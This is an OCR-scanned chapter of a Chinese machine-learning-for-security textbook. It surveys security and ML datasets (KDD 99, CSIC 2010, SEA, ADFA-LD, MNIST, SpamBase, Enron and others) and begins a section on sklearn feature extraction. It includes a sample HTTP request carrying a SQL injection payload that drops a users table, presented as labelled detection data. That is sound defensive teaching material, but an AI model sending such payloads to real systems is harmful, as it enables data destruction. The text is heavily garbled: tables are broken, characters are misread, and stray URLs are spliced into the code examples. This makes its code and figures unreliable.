类 型 ”访问 控制 文件 的 次 数 ， 连 续 ， 范 围 是 [0, 9]。 例 如 对 /etc/passwd 或 .rhosts 文件 


续 ， 范 围 是 [0, 100] 


的 访问 


类 型 ”一 个 FTP 会 话 中 出 站 连接 的 次 数 ， 连 续 ， 取 值 是 0。 数据 集中 这 一 特征 出 现 次 


数 为 0 


特征 名 称 


is hot login 


is guest login 


特征 名 称 
count 
srv count 


serror rate. 


srv serror rate 


rerror rate 


srv rerror rate 


same srv rate 


diff srv rate 


rv diff host rate 


数据 类 型 


离散 类 型 


AMAA FE guest 登录 则 为 1, 


数据 类 型 


特征 名 称 


dst host count 


dst host srv count 


dst host same srv_rate 


dst host diff srv rate 


dst host same src port rate j 


dst host srv diff host rate 


dst host serror rate 


dst host srv serror rate. 


登录 是 人 否 属 于 “hot 


(5E) 


列表 ， 是 为 1， 否则 为 0， 离 散 ， 取 值 是 0 或 1。 例 如 超 


级 用 户 或 管理 员 登 录 


过 去 2 秒 内 ， 与 当前 连 
过 去 2 秒 内 ， 与 当前 连接 具有 相同 服务 的 连接 数 ， 连 续 ， 范 围 是 
过 去 2 秒 内 ， 在 与 当前 连接 具有 相同 目标 主机 的 连接 中 ， 


的 百分比 ， 


过 去 2 秒 内 ， 在 与 当前 连 
分 比 ， 连 续 ， 


过 去 2 秒 内 ， 在 与 当前 连接 具有 相同 目标 主机 的 连接 中 ， 


的 百分比 ， 


过 去 2 秒 内 ， 在 与 当前 连 
4b, xk, 
过 去 2 秒 内 ， 在 与 当前 连接 具有 相同 目标 主机 的 连接 中 ， 与 当前 连 
的 连接 的 百分比 ， 连 续 ， 
过 去 2 秒 内 ， 在 与 当前 连接 具有 相同 目标 主机 的 连接 中 ， 与 当前 连 
的 连接 的 百分比 ， 连 续 ， 
过 去 2 秒 内 ， 在 与 当前 连接 具有 相同 服务 的 连接 中 ， 与 当前 连 
的 连接 的 百分比 ， 连 续 ， 


数据 类 型 
连续 类 型 


否则 为 0， 离 散 ， 取 值 是 0 或 1 
表 3-5 KDD 99 基 于 时 间 的 网 络 流量 统计 特征 


内 容 描 述 
车 接 具 有 相同 的 目标 主机 的 连接 数 ， 连 续 ， 范 围 是 [0, 511] 
[0, 511] 
出 现 “SYN ”错误 的 连接 
连续 ， 范 围 是 [0.00, 1.00] 


车 接 具 有 相同 服务 的 连接 中 ， 
范围 是 [0.00, 1.00]。 


出 现 “SYN ” 销 误 的 连接 的 百 


出 现 “ REJ” 和 错误 的 连接 


连续 ， 范 围 是 [0.00, 1.00] 


车 接 具 有 相同 服务 的 连接 中 ， 
范围 是 [0.00, 1.00] 


出 现 “REJ” 错 误 的 连接 的 百 


车 接 具 有 相同 服务 
范围 是 [0.00, 1.00] 
车 接 具 有 不 同 服务 
范围 是 [0.00, 1.00]。 





车 接 具 有 不 同 目标 主机 
范围 是 [0.00, 1.00]. 


43-6 KDD 99 基 于 主机 的 网 络 流量 统计 特征 


前 100 个 连接 中 ， 与 当前 连接 具有 相同 目标 主机 的 连接 数 ， 


是 [0, 255] 

AY 100 个 连接 中 ， 与 当前 连 
组， 范围 是 [0, 255] 

前 100 个 连接 中 ， 与 当前 连接 具有 相同 目标 主机 相同 服务 的 连接 所 占 的 

ADEE, xXEZE, YO. HS [0.00, 1.00] 

前 100 个 连接 中 ， 与 当前 连接 具有 相同 目标 主机 不 同 服 务 的 连接 所 占 的 

上 百分比， 连续， 范围 是 [0.00, 1.00] 

前 100 个 连接 中 ， 与 当前 连接 具有 相同 目标 主机 相同 源 闪 口 的 连接 所 占 
的 特 分 比 ， 连 续 ， 范 围 是 [0.00, 1.00] 

Bj 100 个 连接 中 ,与 当前 连接 具有 相同 目标 主机 相同 服务 的 连接 中 ， 与 
当前 连接 具有 不 同 源 主 机 的 连接 所 占 的 百分比 ， 连 续 ， 范 围 是 [0.00, 1.00] 

Bj 100 个 连接 中 ,与 当前 连接 具有 相同 目标 主机 的 连接 中 ， 出 现 SYN 
错误 的 连接 所 占 的 百分比 ， 连 续 ， 范 围 是 [0.00, 1.00] 

BY 100 个 连接 中 ， 与 当前 连接 具有 相同 目标 主机 相同 服务 的 连接 中 ， 出 
现 “SYN” 错 误 的 连接 所 占 的 百分比 ， 连 续 ， 范 围 是 [0.00, 1.00] 


XE, WB 


车 接 具 有 相同 目标 主机 相同 服务 的 连接 数 ， 连 


特征 名 称 数据 类 型 内 容 摘 述 
dst host rerror rate 连续 类 型 “前 100 个 连接 中 ,与 当前 连接 具有 相同 目标 主机 的 连接 中 ， 出 现 “REJ” 


错误 的 连接 所 占 的 百分比 ， 连 续 ， 范 围 是 [0.00, 1.00] 
dst host srv rerror rate 连续 类 型 “前 100 个 连接 中 ,与 当前 连接 具有 相同 目标 主机 相同 服务 的 连接 中 ， 出 
现 “REJ” 错 误 的 连接 所 占 的 百分比 ， 连 续 ， 范 围 是 [0.00, 1.00] 





3.2. HTTP DATASET CSIC 2010 


HTTP DATASET CSIC 2010 包 含 大量 标 注 过 的 针对 Web 服 务 的 36000 个 正常 请 求 以 及 25000 个 攻击 请 求 ， 攻 击 类 型 包括 sql 注 入 、 缓 冲 区 溢出 、 信 息 泄露 、 文 件 包含 、xss 等 ， 被 广泛 用 于 WAF 类 产品 的 
功能 评测 。 


正常 请 求 格式 如 图 3-2 所 示 。 


^j normalTrafficTraining.txt ~ 
GET http://localhost:88Bü8/tiendal/index.jsp HTTP/1.1 


Pragma: no-cache 
Cache-control: no-cache 


Accept-Charset: utf-8, 

Accept-Language: en 

Host: localhost: 8088 

Cookie: JSESSIONID-1F767F17239C9B678A39E9B10C3825F4 
Connection: close 


GET http://localhost:B8Bü/tiendal/publico/anadir.jsp? 
id-3&nombre-Vino-«Rioja&precio-188&cantidad-55&Bl-A*Fladir-al-carrito HTTP/1.1 


Pragma: no-cache 
Cache-control: no-cache 


Accept-Language: en 

Host: localhost:B888 

Cookie: JSESSIONID-81761ACA843B8E65014CA42A4BCDO6AB5 
Connection: close 





图 3-2 CSIC 2010 正 常 请 求 示例 


攻击 请 求 格式 如 图 3-3 所 示 。 


3.2.3 ”SEA 数据 集 
2001 年 Schonlau 等 人 第 一 次 将 内 部 攻击 者 分 类 为 “叛徒 ” (Traitor) 与 “伪装 者 ” (Masquerader) ， 其 中 “叛徒 ” 指 攻击 者 来 源 于 组 织 内 部 ， 本 身 是 内 部 合法 用 户 ; “ARE” IKEAN 
取 了 内 部 合法 用 户 的 身份 凭证 ， 从 而 利用 内 部 用 户 身份 实施 内 部 攻击 。 随 后 该 团队 构造 了 一 个 公开 的 检测 伪装 者 攻击 的 数据 集 SEA， 该 数据 集 被 广泛 用 于 内 部 伪装 者 威胁 检测 研究 。 


SEA 数据 集 涵盖 70 多 个 UNIX 系 统 用 户 的 行为 日 志 ， 这 些 数据 来 自 于 UNIX 系 统 acct 机 制 记录 的 用 户 使 用 的 命令 。SEA 数 据 集中 每 个 用 户 都 采集 了 15000 条 命令 ， 从 用 户 集合 中 随机 抽取 50 个 用 户 作为 正常 
用 户 ， 剩 余 用 户 的 命令 块 中 随机 插入 模拟 命令 作为 内 部 伪装 者 攻击 数据 。SEA 数 据 集中 的 用 户 日 志 类 似 于 下 面 的 命令 序列 : 





(cpp sh, cpp, sh, xrdb, mkptshttp://www.hzcourse.com/resource/readBook?path-/openresources/teach ebook/uncompressed/16472/OEBPS/Text/...} 


© © © A anomalousTrafficTest.txt ~ 


GET http://localhost:8080/tiendal/publico/anadir.jsp? 
id=2&nombre=J]Jam%F3n+Ib%E9rico&precio=85&cantidad=%27%3B+DROP+TABLE+usuarios%3B+SELECT+*+FROM+ 
datos+WHERE+nombre+LIKE+%27%25&B1=A%Fladir+al+carrito HTTP/1.1 


Pragma: no-cache 

Cache-control: no-cache 

Accept: text/xml,application/xml.application/xhtml«xml,text/html;g-0.9,text/ 
plain;a=0.8, image/png, */*;q=0.5 

Accept-Encoding: x-gzip, x-deflate, gzip, deflate 


Accept-Language: en 

Host: localhost: 8080 

Cookie: JSESSIONID-B92A8B48B9008CD29F622A994E0F650D 
Connection: close 


POST http://localhost: 8080/tiendal/publico/anadir.jsp HTTP/1.1 
User-Agent: Mozilla/5.0 (compatible; Kongueror/3.5; Linux) KHTML/3.5.8 (like Gecko) 


Pragma: no-cache 

Cache-control: no-cache 

Accept: text/xml,application/xml,application/xhtml*xml,text/html;g-0.9,text/ 
plain;g-0.8,image/png,*/*;q-0.5 

Accept-Encoding: x-gzip, x-deflate, gzip, deflate 


Accept-Language: en 

Host: localhost:8080 

Cookie: JSESSIONID-AE29AEEBDE479D5E1A18B4108CBE3CEO0 
Content-Type: application/x-www-form-urlencoded 
Connection: close 

Content-Length: 146 


id=2&nombre=Jam*F3n+Ib%ESrico&precio=85&cant idad=%27%3B+DROP+TABLE+usuarios%3B+SELECT+*+FROM+ 
datos+WHERE+nombre+LIKE+%27%25&B1=A%F ladir+al+carrito 





图 3-3 CSIC 2010 攻 击 请 求 示 例 


每 个 用 户 的 数据 按照 每 100 个 命令 为 一 块 ， 分 为 150 个 块 ， 前 三 分 之 一 数据 块 用 作 训练 该 用 户 正常 行为 模型 ， 剩 余 三 分 之 二 数据 块 随机 插入 了 测试 用 的 恶意 数据 。SEA 数 据 集中 恶意 数据 的 分 布 具有 统计 
规律 ， 任 意 给 定 一 个 测试 集 命令 块 ， 其 中 含有 恶意 指令 的 概率 为 1%; 而 当 一 个 命令 块 中 含有 恶意 指令 ， 则 后 续 命令 块 也 含有 恶意 指令 的 概率 达到 80%。 可 以 看 出 SEA 中 的 数据 集 将 连续 数据 块 看 作 一 个 会 
话 ， 只 能 模拟 连续 会 话 关联 的 攻击 行为 ;此 外 由 于 缺乏 用 户 详细 个 人 信息 〈 职 位、 权限 等 ) 、 数 据 维度 单一 〈 仅 有 命令 信息 ) 以 及 构造 性 (恶意 数据 由 人 工 模拟 ) 等 因素 ， 数 据 集 在 内 部 威胁 检测 研究 中 作 
用 有 限 。 


Schonlau 在 他 的 个 人 网 站 http://www.schonlau.net/ 上 发 布 了 SEA 数据 集 ， 见 图 3-4。 


3.24 ADFA-LD 数 据 集 


ADFA-LD 数 据 集 是 澳大利亚 国防 学 院 对 外 发 布 的 一 套 主 机 级 入 侵 检 测 系统 的 数据 集合 ， 被 广泛 应 用 于 入 侵 检测 类 产品 的 测试 。 该 数据 集 包括 Linux 和 Windows， 记 录 了 系统 调用 数据 ，Gideon Creech 
是 这 个 项 目的 负责 人 ， 项 目 主 页 为 : https://www.unsw.adfa.edu.au， 见 图 3-5。 
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Masquerading User Data 


We have collected a data set with seeded masquerading users to compare various intrusion 
detection methods. The data set is available here . 


The data consist of 50 files corresponding to one user each. Each file contains 15,000 commands 
(audit data generated with acct). The first 5000 commands for each user do not contain any 
masqueraders and are intended as training data. The next 10,000 commands can be thought of as 
100 blocks of 100 commands each. They are seeded with masquerading users, i.e. with data of 
another user not among the 50 users. 

At any given block after the initial 5000 commands a masquerade starts with a probability of 1%. If 
the previous block was a masquerade, the next block will also be a masquerade with a probability of 
8096. About 596 of the test data contain masquerades. 


This data set is used in an article in Statistical Science (see publications on the left). For further 
information please consult this article or contact me. 


e Masquerade Data (zip File) Uncompress using WinZip. 
Masquerade Data (Unix) uncompress (gunzip), and de-tar (tar -x) the data set. 
This contains 50 files, one each for 50 users. Each file contains 15000 lines. Each line has one 
command. 

e Location of masquerades (Windows ascii file) 
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图 3-5 ADFA 主 页 


ADFA-LD 数 据 集 已 经 将 各 类 系统 调用 完成 了 特征 化 ， 并 针对 攻击 类 型 进行 了 标注 ， 各 种 攻击 类 型 列举 见 表 3-7。 


表 3-7 ADEFA-LD 攻 击 类 型 


攻击 类 型 数据 量 标注 类 型 攻击 类 型 数据 量 标注 类 型 
Training 833 normal Adduser 91 attack 
Validation 4 373 normal Java-Meterpreter 125 attack 
Hydra-FTP 162 attack Meterpreter 75 attack 
Hydra-SSH 148 attack Webshell 118 attack 


ADFA-LD 数 据 集 的 每 个 数据 文件 都 独立 记录 了 一 段 时 间 内 的 系统 调用 顺序 ， 每 个 系统 调用 都 用 数字 编号 ， 对 应 的 编号 举例 如 下 : 


#define R io setup 0  SYSCALL( NR io setup, sys io | setup) 
#define R io destroy Io __SYSCALL ( NR | io destroy, SyS . io destroy) 
#define R io submit 2 __SYSCALL ( R io submit, sys io submit) 














#define R io | getevents 4 |. SYSCALL( | _NR io getevents, sys io getevents) 
#define R setxattr 5 __SYSCALL ( NR setxattr, sys . setxattr) 
#define 


























N 
N 
N N 
#define O NR io cancel 3 .. SYSCALL( “NR io cancel, sys io | cancel) 
NI 
^l 
| N 











R lsetxattr 6  SYSCALL( NR lsetxattr, sys lsetxattr) 


3.2.5 ”Alexa 域 名 数据 


Alexa 是 一 家 专门 发 布 网 站 世界 排名 的 网 站 。 以 搜索 引擎 起 家 的 Alexa 创 建 于 1996 年 4 月 (美国 ) ， 目 的 是 让 互联 网 网 友 在 分 享 虚拟 世界 资源 的 同时 ， 更 多 地 参与 互联 网 资源 的 组 织 。Alexa 每 天 在 网 上 搜 
集 超过 1000GB 的 信息 ， 不 仅 给 出 多 达 几 十 亿 的 网 址 链接 ， 而 且 为 其 中 的 每 一 个 网 站 进行 了 排名 。 可 以 说 ，Alexa 是 当前 拥有 URL 数 量 最 庞大 、 排 名 信息 发 布 最 详尽 的 网 站 。Alexa 排 名 是 常 被 引用 的 用 来 评价 
某 一 网 站 访问 量 的 指标 之 一 。 事 实 上 ，Alexa 排 名 是 根据 用 户 下 载 并 安装 了 Alexa Tools Bar 嵌 入 到 IE、FireFox 等 浏览 器 ， 从 而 监控 其 访问 的 网 站 数据 进行 统计 的 ， 因 此 ， 其 排名 数据 并 不 具有 绝对 的 权威 
性 。 但 其 提供 了 包括 综合 排名 、 到 | 访 量 排名 、 页 面 访问 量 排名 等 多 个 评价 指标 信息 ， 且 尚 没有 而 且 也 很 难 有 更 科学 、 合 理 的 评价 参考 。Alexa 对 外 提供 了 全 球 排名 TOP 一 百 万 的 网 站 域名 的 下 载 ， 文 件 是 CSV 
格式 ， 以 排名 、 域 名 组 成 ， 如 图 3-6 所 示 。 











图 3-6 ”Alexa 排 名 数据 


3.2.6 ”Scikit-Learn 数 据 集 


Scikit-Learn 自 带 的 数据 集合 也 十 分 经 典 ， 其 中 最 常见 的 是 iris 数 据 集 。 


iris 中 文 指 营 尾 植物 ， 这 里 存储 了 其 莹 片 和 花 闪 的 长 宽 ， 一 共 4 个 属性 ， 营 尾 植 物 又 分 3 类 。 与 之 相对 ，iris 里 有 2 个 属性 : iris.data 和 iris.target。data 里 是 一 个 矩阵 ， 每 一 列 代表 了 苯 片 或 花 准 的 长 宽 ， 一 
共 4 列 ， 一 共 采 样 了 150 条 记录 。targe 韦 一 个 数组 ， 人 存储 了 data 中 每 条 记录 属于 哪 一 类 莹 尾 植物 ， 所 以 数组 的 长 度 是 150， 数 组 元 素 的 值 因 为 共有 3 类 营 尾 植物 ， 所 以 不 同 值 只 有 3 个 。 


3.2.7 ”MNIST 数 据 集 


MNIST 是 一 个 入 门 级 的 计算 机 视觉 数据 集 ， 它 包含 各 种 手写 数字 图 片 ， 如 图 3-7 所 示 。 





图 3-7 MNIST 图 片 示例 


MNIST 也 包含 每 一 张 图 片 对 应 的 标签 ， 告 诉 我 们 这 是 数字 几 。 比 如 ， 图 3-7 中 4 张 图 片 的 标签 分 别 是 5，0，4，1。 数 据 集 包 括 60000 个 训练 数据 和 10000 个 测试 数据 。 每 一 个 MNIST 数 据 单元 由 两 部 分 组 
bk: 一 张 包含 手写 数字 的 图 片 和 一 个 对 应 的 标签 。 每 一 张 图 片 包含 28x 28 个 像素 点 ， 可 以 把 这 个 数组 展开 成 一 个 向 量 ， 长 度 是 28x28=784。MNIST 数 据 集 详解 见 表 3-8。 


表 3-8 MNIST 数 据 集 合 详解 


文件 名 称 文件 用 途 
train-images-idx3-ubyte.gz 60 000 个 图 乒 训 练 样 本 
train-labels-idx1-ubyte.gz 60 000 个 图 片 训练 样本 的 标注 
tl0k-images-idx3-ubyte.gz 10 000 个 图 片 测试 样本 
tl0k-labels-idx1-ubyte.gz 10 000 个 图 片 测试 样本 的 标注 


MNIST 的 网 址 为 http://yann.lecun.com/exdb/mnist/， 如 图 3-8 所 示 。 


G | © yann.lecun.com/exdb/mnist/ 








THE MNIST DATABASE 
of handwritten digits 


Yann LeCun, Courant Institute, NYU 
Corinna Cortes, Google Labs, New York 
Christopher J.C. Burges, Microsoft Research, Redmond 


The MNIST database of handwritten digits, available from this page, has a training set of 60,000 examples, and a test set of 10,00 
from NIST. The digits have been size-normalized and centered in a fixed-size image. 


It is a good database for people who want to try learning techniques and pattern recognition methods on real-world data while sp 
formatting. 


Four files are available on this site: 


train-images-idx3-ubyte.g2: training set images (9912422 bytes) 
train-labels-idxl-ubyte.gz: training set labels (28881 bytes) 


tlOk-i es-i -ubyte.gz: test set images (1648877 bytes) 
= -i = : test set labels (4542 bytes) 





图 3-8 MNIST 官 网 


也 可 以 使 用 离线 版 的 MNIST 文 件 ， 下 载 链接 为 : 





http://www.iro.umontreal.ca/~lisa/deep/data/mnist/mnist.pkl.gz 





文件 读 取 方 式 为 : 





import pickle 
import gzip 
def load data(): 
with gzip.open('./mnist.pkl.gz') as fp: 
training data, valid data, test data - pickle.load(fp 
return training data, valid data, test data 

















— 




















3.2.8 Movie Review Data 


Movie Review Data 数 据 集 包含 1000 条 正面 的 评论 和 1000 条 负面 评论 ， 被 广泛 应 用 于 文本 分 类 ， 尤 其 是 恶意 评论 识别 方面 。 本 书 使 用 其 最 新 的 版 本 ，polarity dataset v2.0。 其 官网 如 图 3-9 所 示 。 


= => C ||| www.s.cornell.edu/People/pabo/movie-review-data/ VW 








This page is a distribution site for movie-review data for use in sentiment-analysis experiments. Available are collections 
of movie-review documents labeled with respect to their overall sentiment polarity (positive or negative) or subjective 
rating (e.g., "two and a half stars") and sentences labeled with respect to their subjectivity status (subjective or objective) 
or polarity. These data sets were introduced in the following papers: 


e Bo Pang, Lillian Lee, and Shivakumar Vaithyanathan, Thumbs up? Sentiment Classification using Machine 
Learning Techniques, Proceedings of EMNLP 2002. 


e Bo Pang and Lillian Lee, A Sentimental Education: Sentiment Analysis Using Subjectivity Summarization Based 
on Minimum Cuts, Proceedings of ACL 2004. 


e Bo Pang and Lillian Lee, Seeing stars: Exploiting class relationships for sentiment categorization with respect to 
rating scales, Proceedings of ACL 2005. 


Until April 2012 (but no longer), we maintained a list for of other papers using our data the purposes of facilitating 
comparison of results. 


Please cite the version number of the dataset you used in any publications, in order to facilitate 
comparison of results. Thank you. 


Sentiment polarity datasets 


e polarity dataset v2.0 (3.0Mb) (includes README v2.0): 1000 positive and 1000 negative processed reviews. 
Introduced in Pang/Lee ACL 2004. Released June 2004. 

e Pool of 27886 unprocessed html files (81.1Mb) from which the polarity dataset v2.0 was derived. (This file is 
identical to movie.zip from data release v1.0.) 

e sentence polarity dataset v1.0 (includes sentence polarity dataset README v1.0: 5331 positive and 5331 negative 
processed sentences / snippets. Introduced in Pang/Lee ACL 2005. Released July 2005. 





图 3-9 Movie Review Data 官 网 


Movie Review Data 数 据 集 记录 的 都 是 原始 评论 数据 ， 全 部 为 英文 ， 文 本 内 容 举例 如 下 : 











films adapted from comic books have had plenty of success , whether they're about superheroes ( batman , superman , spawn ) , or geared toward kids ( casper ) or the arthouse c 
for starters , it was created by alan moore ( and eddie campbell ) , who brought the medium to a whole new level in the mid '80s with a 12-part series called the watchmen . 
the film , however , is all good . 


























2: 00 - r for strong violence/gore , sexuality , language and drug content 





文件 包含 在 neg 和 pos 两 个 文件 夹 下 面 ， 见 图 3-10， 分 别 代 表 正 面 和 负面 评价 。 
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图 3-10 Movie Review Dat 文 件 夹 结构 


Movie Review Data 对 应 网 址 为 : http://www.cs.cornell.edu/People/pabo/movie-review-data/, 


3.2.9 ”SpamBase 数 据 集 


SpamBase 是 入 门 级 的 垃圾 邮件 分 类 训练 集 ， 其 主页 如 图 3-11 所 示 。 
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Data Set Characteristics: tances: | 4601 
Attribute Characteristics: || Integer, Real | Number of Attributes: 
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Associated Tasks: ‘lassificatio | Missing Values? Number of Web Hits: 


Source: 





Creators: 


Mark Hopkins, Erik Reeber, George Forman, Jaap Suermonat 
Hewlett-Packard Labs, 1501 Page Mill Rd., Palo Alto, CA 94304 


Donor: 


George Forman (gforman at nospam hpl.hp.com) 650-857-7835 


图 3-11 SpamBase 主 页 
spamBase 的 数据 不 是 原始 的 邮件 内 容 而 是 已 经 特征 化 的 数据 ， 对 应 的 特征 是 统计 的 关键 字 以 及 特殊 符号 的 词 频 ， 一 共 58 个 属性 ， 其 中 最 后 一 个 是 垃圾 邮件 的 标记 位 。 


特征 属性 举例 如 图 3-12 所 示 。 


Œ [5 archive.ics.uci.edu/ml/machine-learning-databases/spambas... ye 


| spam, non-spam classes 


word freq make: continuous. 
word freq address: continuous. 
word freq all: continuous. 
word freq 3d: continuous. 
word freq our: continuous. 
word freq over: continuous. 
word freq remove: continuous. 
word freq internet: continuous. 
word freq order: continuous. 
word freq mail: continuous. 
word freq receive: continuous. 





图 3-12 ”SpamBase 数 据 特征 举例 
数据 来 源 为 4601 封 邮件 ， 其 中 1813 封 为 垃圾 邮件 ， 数 据 内 容 举例 如 下 : 


0,0.64,0.64,0,0.32,0,0,0,0,0,0,0.64,0,0,0,0.32,0,1.29,1.93,0,0.96,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0.778,0,0,3.756, 61,278,1 0.21,0.28,0.5,0,0.14,0.2€ 





SpamBase 对 应 网 址 为 : http://archive.ics.uci.edu/ml/datasets/Spambase, 


3.2.10 “Enron 数 据 集 


Enron (安然 公司 ) 在 2001 年 宣告 破产 之 前 ， 拥 有 约 21000 名 雇员 ， 曾 是 世界 上 最 大 的 电力 、 天 然 气 以 及 电讯 公司 之 一 ，2000 年 披露 的 营业 额 达 1010 人 2 美元 之 巨 。 公 司 连 续 六 年 被 财富 杂志 评选 为 “ 美 
国 最 具 创 新 精神 公司 ”， 然 而 真正 使 Enron 公 司 在 全 世界 声名 大 噪 的 ， 却 是 这 个 拥有 上 王 亿 资产 的 公司 2002 年 在 几 周 内 破产 ， 以 及 持续 多 年 精心 策划 、 乃 至 制度 化 系统 化 的 财务 造假 丑闻 。Enron 欧 洲 分 公 
司 于 2001 年 11 月 30 日 申请 破产 ， 美 国 本 部 于 2 日 后 同样 申请 破产 保护 。 但 在 其 破产 前 的 资产 规模 为 498 亿 美元 ， 并 有 312 亿 的 沉重 债务 。 过 度 膨 胀 的 快速 发 展 使 其 无 法 应 对 经 济 环境 的 逆转 ， 从 而 导致 无 法 经 
营运 作 状 况 的 恶化 ， 最 终 以 破产 结束 企业 。 机 器 学 习 领 域 使 用 Enron 公 司 的 归档 邮件 来 研究 文档 分 类 、 词 性 标注 、 垃 圾 邮件 识别 等 ， 由 于 Enron 的 邮件 都 是 真实 环境 下 的 真实 邮件 ， 非 常 具有 实际 意义 。 本 书 
使 用 的 Enron 数 据 集 是 经 过 人 工 标注 过 的 正常 邮件 和 垃圾 邮件 ( 见 图 3-13) ， 属 于 狭义 的 Enron 数 据 集合 ， 广 义 的 Enron 数 据 集 指 全 量 真实 且 未 被 标记 的 Enron 公 司 归 档 邮 件 。 


Enron 数 据 集合 使 用 不 同文 件 夹 区 分 正常 邮件 和 垃圾 邮件 ， 如 图 3-14 所 示 。 


正常 邮件 内 容 举 例如 下 : 





Subject: christmas baskets 

the christmas baskets have been ordered . 
we have ordered several baskets . 
individual earth - sat freeze - notis 
smith barney group baskets 

rodney keys matt rodgers charlie 

notis jon davis move 

team 

phillip randle chris hyde 

harvey 
































— C | | | www2.aueb.gr/users/ion/data/enron-spam/ 


Contents of this directory: 


e readme.txt 
e Enron-Spam in pre-processed form: 
o Enronl 
Enron2 
Enron3 
Enron4 
o Enron6 
e Enron-Spam in raw form: 
o ham messages: 
beck-s 
farmer-d 
kaminski-v 
kitchen-l 


spam messages: 
BG 
GP 





图 3-13 Enron 数据 集 主页 
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图 3-14 Enron 数据 集 文件 夹 结 构 


垃圾 邮件 内 容 举例 如 下 : 
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r email address was ob 
eference # 2020 mid = 33 
from this list , please click here and enter 

your name into the remove box . if you have previously unsubscribed 
and are still receiving this message , you may email our abuse 





tained from a purchased list , 
00 . if you wish to unsubscribe 














control center , or call 
6484 coral way , miami 





web credit inc . a 


33155 " 





, f] , 
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rights reserved . 





- 888 - 763 - 2497 , or write us at : 
. 2002 


nospam , 


Enron 数 据 集 对 应 的 网 址 为 : http://www2.aueb.gr/users/ion/data/enron-spam/, 


3.3 


特征 提取 


机 器 学 习 中 ， 特 征 提取 被 认为 是 个 体力 活 ， 有 人 形象 地 称 为 “特征 工程 ”， 可 见 其 工作 量 之 大 。 特 征 提取 中 数字 型 和 文本 型 特征 的 提取 最 为 常见 。 


3.3.] 


数字 型 特征 提取 


数字 型 特征 可 以 直接 作为 特征 ， 但 是 对 于 一 个 多 维 的 特征 ， 某 一 个 特征 的 取 值 范围 特别 大 ， 很 可 能 导致 其 他 特征 对 结果 的 影响 被 忽略 ， 这 时 候 我 们 需要 对 数字 型 特征 进行 预 处 理 ， 常 见 的 预 处 理 方式 有 
以 下 几 种 。 


1. 标 准 化 : 


>>> 








from sklearn import preprocessing 


>>> import numpy as np 


>>> X = np.array([[ 1., -1., 





ht 











ht 


>>> X scal 
>>> X scaled 


2.], 


tp: //www.hzcourse.com/resource/ read 








tp: //www.hzcourse.com/resource/ read 





























array([[ 0. http: 
[ L.22http: 
[-1.22http: 

2. 正 则 化 : 

>>> X= [[ 1., -1. 

ht 








ht 


>>> X normal 
>>> X normalized 





led = preprocessing.scale (X) 


/ /www .hzcourse.com/resource/readBook?path-/openresources/teach ebook/uncompressed/1 


Book?path-/openresources/i1 





teach ebook/uncompressed/] 








Book?path-/openresources/i1 

















teach ebook/uncompressed/1 





6472/0EBPS/Text/... 
6472/0EBPS/Text/... 

















/ /www .hzcourse.com/resource/readBook?path-/openresources/teach ebook/uncompressed/16472/OEBPS/Text 
/ /www .hzcourse.com/resource/readBook?path-/openresources/teach ebook/uncompressed/] 


r 2.], 


tp: //www.hzcourse.com/resource/ read 








tp: //www.hzcourse.com/resource/ read 


























array([[ 0.40http: 
| da ACES: 
[ 0. http: 
3. 归 一 化 : 


>>> X train - 





ht 





ht 








ht 





a np.array([[ bay -1., 
tp://www.hzcourse.com/resource/readl 
tp://www.hzcourse.com/resource/readl 
tp://www.hzcourse.com/resource/readl 
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teach ebook/uncompressed/] 














Book ?path=/openresources/1 














teach ebook/uncompressed/1 





ized = preprocessing.normalize(X, norm='12"') 








6472/O0EBPS/Text/... [ 2% 
6472/O0EBPS/Text/... [ 0 





6472/O0EBPS/Text/... 


6472/O0EBPS/Text/... 


/ /www .hzcourse.com/resource/readBook?path-/openresources/teach ebook/uncompressed/16472/OEBPS/Text/... 
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6472/O0EBPS/Text 
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= preprocessing.MinMaxScaler () 





>>> min max scaler 
>>> X train minmax 
>>> X train minmax 





array([[ 0.5 


L 1. 
| 0. 











= min max scaler. 
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r 0: 


3.3.2 文本 型 特征 提取 


文本 型 数据 提取 特征 相对 数字 型 要 复杂 很 多 ， 本 质 上 是 做 单词 切 分 ， 


>>> measurements = 








ht 











h 
ht 
h 








键 值 city 具 有 多 个 取 值 ， 


>>> 
>>> vec = 
>>> vec. 





tp: //www.hzcourse. 
tp: //www.hzcourse. 
tp: //www.hzcourse. 
tp: //www.hzcourse 
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com/resource/readi 





com/resource/readi 





com/resource/readi 








.Com/resource/readl 





"Dubai" , 





, 1. ] 
, 0.33333333] 
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Fit transform(X train) 
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teach ebook/uncompressed/1 
teach ebook/uncompressed/1 















































array([[ 1., Ors 


>>> vec.get 


0., Ls 
[ 0., 0. 


, 0., 
, 0., 
, 1., 


33.1; 
ae ae 
18:11) 











feature names () 


from sklearn.feature extraction import DictVectorizer 
DictVectorizer () 
Fit transform (measurements) .toarray () 


teach ebook/uncompressed/1 





['city-Dubai', 'city-London', 'city-San Fransisco', 'temperature'] 


6472/O0EBPS/Text/... 
6472/O0EBPS/Text/... 
6472/O0EBPS/Text/... 
6472/0EBPS/Text/... ] 


6472/OEBPS/Text/... 
6472/OEBPS/Text/... 
6472/OEBPS/Text/... 





不 同 的 单词 当 作 一 个 新 的 特征 ， 以 hash 结 构 为 例 : 
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1.22http: //www.hzcourse.com/resource/readBook?path-/c 


:/ /www .hzcourse.com/resource/readBook?path-/c 





: / /www .hzcourse .com/resource/readBook?path-/c 
:/ /www .hzcourse.com/resource/readBook?path-/c 











r 0.], 
x cS 
-0.40http 
0. http 
0.70http 
[ 2., 0., Daly 
[ 0., dos -1.]]) 
'Dubai', 'temperature': 33.}, 
'London', 'temperature': 12.], 
'San Fransisco', 'temperature': 18.], 





"London" #] "San Fransisco" ， 直 接 把 每 个 取 值 作 为 新 的 特征 即 可 。 键 值 temperature 是 数值 型 ， 可 以 直接 作为 特征 使 用 。 





文本 特征 提取 有 两 个 非常 重要 的 模型 。 


词 集 模型 : 单词 构成 的 集合 ， 集 合 中 每 个 元 素 都 只 有 一 个 ， 即 词 集 中 的 每 个 单词 都 只 有 一 个 。 


. 词 袋 模型 : 如 果 一 个 单词 在 文档 中 出 现 不 止 一 次 ， 并 统计 其 出 现 的 次 数 ( 频 数 ) 。 


两 者 本 质 上 的 区 别 ， 词 袋 是 在 词 集 的 基础 上 增加 了 频率 的 维度 : 


假设 我 们 要 对 一 篇 文章 进行 特征 化 ， 
导入 相关 的 函数 库 : 
>>> 














词 集 只 


最 常见 的 方式 就 是 词 袋 。 


关注 有 和 没有 ， 词 袋 还 要 关注 有 几 个 。 


from sklearn.feature extraction.text import CountVectorizer 


